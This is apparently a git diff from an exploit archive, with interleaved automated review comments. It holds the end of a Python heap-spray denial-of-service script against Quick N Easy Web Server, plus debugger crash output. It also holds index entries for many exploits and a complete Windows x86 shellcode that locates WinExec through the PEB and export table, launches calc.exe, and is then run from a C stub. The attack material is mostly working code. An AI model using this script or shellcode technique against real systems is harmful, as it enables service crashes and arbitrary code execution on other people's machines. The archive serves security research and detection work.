Spraying heap with %d 5000-byte requests" % i, end='\r') + sys.stdout.flush() + if re.search(crashed, s.recv(1024)): + print(" "*50) + print("[+] Threads have exited BAADF00D with %d requests!" 
% i) + s.close() + exit() + s.close() + i = i+1 + except Exception, msg: + print("[-] Something went wrong :(") + print(msg) + +main() + +""" +0:010> kb7 + # ChildEBP RetAddr Args to Child +00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114 +01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3 +02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775 +03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702] +04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37 +05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d +WARNING: Stack unwind information not available. Following frames may be wrong. +06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27 + +0:010> !analyze -v + +STACK_TEXT: +00000000 00000000 heap_corruption!quickweb.exe+0x0 +SYMBOL_NAME: heap_corruption!quickweb.exe +MODULE_NAME: heap_corruption +IMAGE_NAME: heap_corruption +STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb +FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe +OS_VERSION: 10.0.17763.1 +BUILDLAB_STR: rs5_release +OSPLATFORM_TYPE: x86 +OSNAME: Windows 10 +FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f} +""" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e6dc7ab1f..8d4b7d2cb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
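Review bot: The `except` branch in `main` neither advances `i` nor leaves the loop, so once the server stops accepting connections every iteration raises, the same message is printed and the `while` never terminates; add `break` after `print(msg)`, or at least `i = i+1`. The `except Exception, msg:` syntax and `s.send(http_req)` with a `str` make this Python 2 only, which the `from __future__` import hints at but the header does not state; a `# Python 2 only` comment next to the shebang would help. The status line reports `5000-byte requests` while the `Host:` header is built from `"A"*15000`, so the message and the code disagree, and the usage line in the docstring has lost its host and port arguments.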
@@ -6679,6 +6679,8 @@ id,file,description,date,author,type,platform,port
 48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
 48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
 48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
+48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
+48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10970,6 +10972,8 @@ id,file,description,date,author,type,platform,port
 48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
 48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
 48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows,
+48129,exploits/android/local/48129.rb,"Android Binder - Use-After-Free (Metasploit)",2020-02-24,Metasploit,local,android,
+48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18007,6 +18011,7 @@ id,file,description,date,author,type,platform,port
 48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
 48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
+48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42378,3 +42383,19 @@ id,file,description,date,author,type,platform,port
 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
 48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,
+48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware,
+48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,
+48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php,
+48110,exploits/hardware/webapps/48110.txt,"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48113,exploits/php/webapps/48113.txt,"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-24,J3rryBl4nks,webapps,php,
+48114,exploits/php/webapps/48114.txt,"AMSS++ 4.7 - Backdoor Admin Account",2020-02-24,indoushka,webapps,php,
+48115,exploits/hardware/webapps/48115.pl,"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48117,exploits/php/webapps/48117.txt,"ATutor 2.2.4 - 'id' SQL Injection",2020-02-24,"Andrey Stoykov",webapps,php,
+48118,exploits/hardware/webapps/48118.txt,"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48119,exploits/java/webapps/48119.txt,"ManageEngine EventLog Analyzer 10.0 - Information Disclosure",2020-02-24,"Scott Goodwin",webapps,java,
+48122,exploits/php/webapps/48122.txt,"eLection 2.0 - 'id' SQL Injection",2020-02-24,J3rryBl4nks,webapps,php,
+48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,
+48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
+48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index acc690e2d..b8bdbc71e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1015,3 +1015,4 @@ id,file,description,date,author,type,platform
 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
+48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
diff --git a/shellcodes/windows_x86/48116.c b/shellcodes/windows_x86/48116.c
new file mode 100644
index 000000000..521b0efe8
--- /dev/null
+++ b/shellcodes/windows_x86/48116.c
@@ -0,0 +1,147 @@ +# Title: Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) +# Shellcode Author: Bobby Cooke +# Date: 2020-02-21 +# Technique: PEB & Export Directory Table +# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 + +_start: +; Create a new stack frame + mov ebp, esp ; Set base stack pointer for new stack-frame + sub esp, 0x20 ; Decrement the stack by 32 bytes + +; Find kernel32.dll base address + xor ebx, ebx ; EBX = 0x00000000 + mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB + mov ebx, [ebx+0xC] ; EBX = Address_of_LDR + mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll + mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll + mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll + mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll + mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll + +; Find the address of the WinExec Symbol within kernel32.dll +; + The hex values will change with different versions of Windows + +; Find the address of the Export Table within kernel32.dll + mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader = 0xF8 + add ebx, eax ; EBX = &NewEXEHeader = 0xF8 + &kernel32.dll + mov ebx, [ebx+0x78] ; EBX = RVA ExportTable = 0x777B0 = [&NewExeHeader + 0x78] + add ebx, eax ; EBX = &ExportTable = RVA ExportTable + &kernel32.dll + +; Find the address of the Name Pointer Table within kernel32.dll +; + Contains pointers to strings of function names - 4-byte/dword entries + mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable = 0x790E0 + add edi, eax ; EDI = &NamePointerTable = 0x790E0 + &kernel32.dll + mov [ebp-0x8], edi ; save &NamePointerTable to stack frame + +; Find the address of the Ordinal Table +; - 2-byte/word entries + mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable = 0x7A9E8 + add ecx, eax ; ECX = &OrdinalTable = 0x7A9E8 + &kernel32.dll + mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame + +; Find the address of the Address Table + mov edx, 
[ebx+0x1C] ; EDX = RVA AddressTable = 0x777CC + add edx, eax ; EDX = &AddressTable = 0x777CC + &kernel32.dll + mov [ebp-0x10], edx ; save &AddressTable to stack-frame + +; Find Number of Functions within the Export Table of kernel32.dll + mov edx, [ebx+0x14] ; EDX = Number of Functions = 0x642 + mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame + +jmp short functions + +findFunctionAddr: +; Initialize the Counter to prevent infinite loop + xor eax, eax ; EAX = Counter = 0 + mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame +; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll +searchLoop: + mov edi, [ebp-0x8] ; EDI = &NamePointerTable + mov esi, [ebp+0x18] ; ESI = Address of String for the Symbol we are searching for + xor ecx, ecx ; ECX = 0x00000000 + cld ; clear direction flag - Process strings from left to right + mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] + add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll + add cx, 0x8 ; ECX = len("WinExec,0x00") = 8 = 7 char + 1 Null + repe cmpsb ; compare first 8 bytes of [&NameString] to "WinExec,0x00" + jz found ; If string at [&NameString] == "WinExec,0x00", then end loop + inc eax ; else Counter ++ + cmp eax, edx ; Does EAX == Number of Functions? 
+ jb searchLoop ; If EAX != Number of Functions, then restart the loop + +found: +; Find the address of WinExec by using the last value of the Counter + mov ecx, [ebp-0xC] ; ECX = &OrdinalTable + mov edx, [ebp-0x10] ; EDX = &AddressTable + mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)] + mov eax, [edx + eax*4] ; EAX = RVA WinExec = [&AddressTable + ordinalNumber] + add eax, [ebp-0x4] ; EAX = &WinExec = RVA WinExec + &kernel32.dll + ret + +functions: +; Create string 'WinExec\x00' on the stack and save its address to the stack-frame + mov edx, 0x63657878 ; "cexx" + shr edx, 8 ; Shifts edx register to the right 8 bits + push edx ; "\x00,cex" + push 0x456E6957 ; EniW : 456E6957 + mov [ebp+0x18], esp ; save address of string 'WinExec\x00' to the stack-frame + call findFunctionAddr ; After Return EAX will = &WinExec + +; Call WinExec( CmdLine, ShowState ); +; CmdLine = "calc.exe" +; ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window + xor ecx, ecx ; clear eax register + push ecx ; string terminator 0x00 for "calc.exe" string + push 0x6578652e ; exe. 
: 6578652e + push 0x636c6163 ; clac : 636c6163 + mov ebx, esp ; save pointer to "calc.exe" string in eax + inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 + push ecx ; uCmdShow - push 0x1 to stack # 2nd argument + push ebx ; lpcmdLine - push string address stack # 1st argument + call eax ; Call the WinExec Function + +; Create string 'ExitProcess\x00' on the stack and save its address to the stack-frame + xor ecx, ecx ; clear eax register + mov ecx, 0x73736501 ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string + shr ecx, 8 ; ecx = "ess",0x00 // shr shifts the register right 8 bits + push ecx ; sse : 00737365 + push 0x636F7250 ; corP : 636F7250 + push 0x74697845 ; tixE : 74697845 + mov [ebp+0x18], esp ; save address of string 'ExitProcess\x00' to stack-frame + call findFunctionAddr ; After Return EAX will = &ExitProcess + +; Call ExitProcess(ExitCode) + xor edx, edx + push edx ; ExitCode = 0 + call eax ; ExitProcess(ExitCode) + +; nasm -f win32 win32-WinExec_Calc-Exit.asm -o win32-WinExec_Calc-Exit.o +; for i in $(objdump -D win32-WinExec_Calc-Exit.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo + +##################################################################################### + +#include +#include + +char code[] = \ +"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b" +"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3" +"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24" +"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14" +"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18" +"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74" +"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41" +"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52" +"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51" +"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff" +"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f" 
+"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2" +"\x52\xff\xd0"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int(*)()) code; + (int)(*func)(); +} \ No newline at end of file
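Review bot: Several inline comments in the NASM listing name the wrong register, which misleads anyone reading this file to understand or write detections for the technique: `xor ecx, ecx ; clear eax register` appears twice (before the "calc.exe" and "ExitProcess" string builds) and `mov ebx, esp ; save pointer to "calc.exe" string in eax` writes EBX, so they should read `; clear ecx register` and `; save pointer to "calc.exe" string in ebx`. In the C harness at the end, the two `#include` directives carry no header name as rendered here and `main` ends without a `return`, so the stub as shown does not compile cleanly; I would confirm against the committed file whether the header names were lost in rendering. The export-table offsets quoted in the comments (`0xF8`, `0x777B0`, `0x790E0`, `0x7A9E8`, `0x777CC`, `0x642`) are presented as fixed values even though the listing itself notes they change between Windows builds; a short remark tying them to the "Tested On" build in the header would keep readers from treating them as constants.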